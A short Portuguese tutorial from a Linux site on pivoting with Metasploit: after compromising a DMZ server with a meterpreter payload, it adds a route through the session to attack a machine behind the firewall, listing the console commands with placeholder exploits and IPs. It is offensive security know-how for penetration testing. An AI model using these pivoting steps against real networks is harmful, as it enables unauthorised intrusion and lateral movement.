Metasploit: atacando um objetivo final a partir de uma máquina já comprometida

Publicado por Luiz Vieira em 04/02/2010

[ Hits: 8.302 ]

Blog: http://hackproofing.blogspot.com/

 


Metasploit: atacando um objetivo final a partir de uma máquina já comprometida



Algumas vezes, ao realizar um ataque, é necessário tornar vulneráveis várias máquinas até chegarmos ao nosso objetivo final. E uma das questões mais comuns nestas situações é: como é possível atacar uma máquina a partir de outra a qual já tenho acesso?

Vejamos um exemplo:
Linux: Metasploit: atacando um objetivo final a partir de uma máquina já comprometida
Como podemos ver na imagem acima, um atacante pode ganhar acesso a algum servidor que se encontra na DMZ (zona desmilitarizada) e a partir dali atacar outras máquinas que se encontrem além do firewall. Para isso é possível utilizar o framework Metasploit, o qual será muito útil.

O primeiro passo obviamente é encontrar uma vulnerabilidade no servidor que se encontra na DMZ e explorá-la usando como payload o meterpreter. No terminal do Metasploit digitamos:

use [exploit que ataca a vulnerabilidade encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-a-vulnerabilidade-encontrada


Agora precisamos saber o ID da sessão, para isso digitamos o seguinte no terminal do meterpreter:

sessions -l

O seguinte passo é criar uma rota até a máquina que é nosso objetivo final, indicando seu IP, a máscara e o ID de sessão que obtivemos no passo anterior:

route add [ip_maquina_objetivo] [Máscara de rede] [ID-Sessão]

Por último, realizamos o ataque à máquina objetivo, de forma normal, como se faria em qualquer outro caso, quer dizer, buscando a vulnerabilidade e aplicando o respectivo exploit. A diferença é que devemos dizer ao Metasploit que deve passar pelo PC que já temos acesso:

use [exploit_necessário]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [máquina_objetivo]
exploit


Desta forma podemos realizar um "bypass" usando o Metasploit, algo muito útil para todos os interessados na área de segurança da informação.

Outras dicas deste autor

Como proteger seus dados no computador e smartphone?

TrueCrypt: Open Source para criptografia

Palestra How Stuff Works: Exploits

Revista Espírito Livre n°5

Restaurando o Grub no Ubuntu

Leitura recomendada

Instalando o IRSSI no Ubuntu

Samba, saiba para que serve essa grande ferramenta do Linux

Liberando acesso ao TSWEB (Terminal Services) externo no firewall

As 10 distribuições mais populares

Fedora 17 + MATE = Combinação Perfeita

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts